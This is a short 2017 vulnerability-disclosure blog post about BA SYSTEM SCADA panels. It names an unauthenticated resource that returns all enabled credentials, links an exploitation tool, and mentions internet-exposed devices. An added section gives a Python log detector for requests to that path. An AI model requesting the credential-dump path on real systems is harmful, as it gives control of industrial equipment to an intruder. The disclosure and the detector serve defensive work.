Friday, 29 December 2017

BA SYSTEM; “Improper Access Control (Authorization)”.

SCADA systems from the firm “BA SYSTEM”:

We access the platform:




When attempting any manipulation of the platform's various settings, it asks us for credentials (only a password).

Brute-forcing the field is perfectly valid, although a more efficient and simpler alternative is to request the resource “/isc/get_sid_js.aspx”; this way we obtain a JSON document with all the enabled credentials.



I opted to code a simple tool which, for lack of originality, I named "cafeina":
https://github.com/ezelf/baCK_system




Inside and without restrictions:

and of course, as administrators (after entering the corresponding credentials), one can view/list all of the enabled users, set access levels, change credentials, etc.
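As an added example (not from the original post or the cafeina tool), a defender-side detector that reads web-server access logs from a BA SYSTEM device, or from a reverse proxy in front of it, and flags every successful request to the credential-dump resource from outside a trusted maintenance network. The Common Log Format, the sample lines and the 10.0.0.0/8 trusted range are assumptions:

```python
import ipaddress
import re
from collections import Counter

# Path that, per the post, returns every enabled credential without authentication.
CREDENTIAL_DUMP_PATHS = {"/isc/get_sid_js.aspx"}

# Common Log Format: source, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Constructed sample lines (not from the original post); 10.0.0.0/8 plays the BMS LAN.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Dec/2017:10:15:02 +0100] "GET /isc/get_sid_js.aspx HTTP/1.1" 200 412
10.0.0.5 - - [29/Dec/2017:10:15:03 +0100] "GET /isc/settings.aspx HTTP/1.1" 200 1024
203.0.113.7 - - [29/Dec/2017:10:20:40 +0100] "GET /isc/get_sid_js.aspx?x=1 HTTP/1.1" 200 412
203.0.113.7 - - [29/Dec/2017:10:20:41 +0100] "GET /ISC/get_sid_js.aspx HTTP/1.1" 200 412
198.51.100.2 - - [29/Dec/2017:10:21:00 +0100] "GET /isc/get_sid_js.aspx HTTP/1.1" 401 0
"""


def find_credential_dump_hits(log_text, trusted_nets=("10.0.0.0/8",)):
    """One dict per request to a credential-dump path; 'leaked' means a 2xx answer."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a production parser would count these
        # Strip the query string and lowercase so trivial variations do not evade the match.
        path = m.group("path").split("?", 1)[0].lower()
        if path not in CREDENTIAL_DUMP_PATHS:
            continue
        src = ipaddress.ip_address(m.group("src"))
        status = int(m.group("status"))
        hits.append({
            "src": str(src),
            "ts": m.group("ts"),
            "status": status,
            "trusted": any(src in n for n in nets),
            "leaked": 200 <= status < 300,
        })
    return hits


def untrusted_leaks(hits):
    """Per source address, how many times the user table was served outside the trusted nets."""
    return Counter(h["src"] for h in hits if h["leaked"] and not h["trusted"])
```

Any non-zero count from untrusted_leaks is a confirmed credential exposure for that device; the sound response is to treat every account in its user table as compromised and rotate them, not just block the source.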




“BA_SYSTEM” SCADAs in the wild:

According to different search criteria







Vulnerable list:


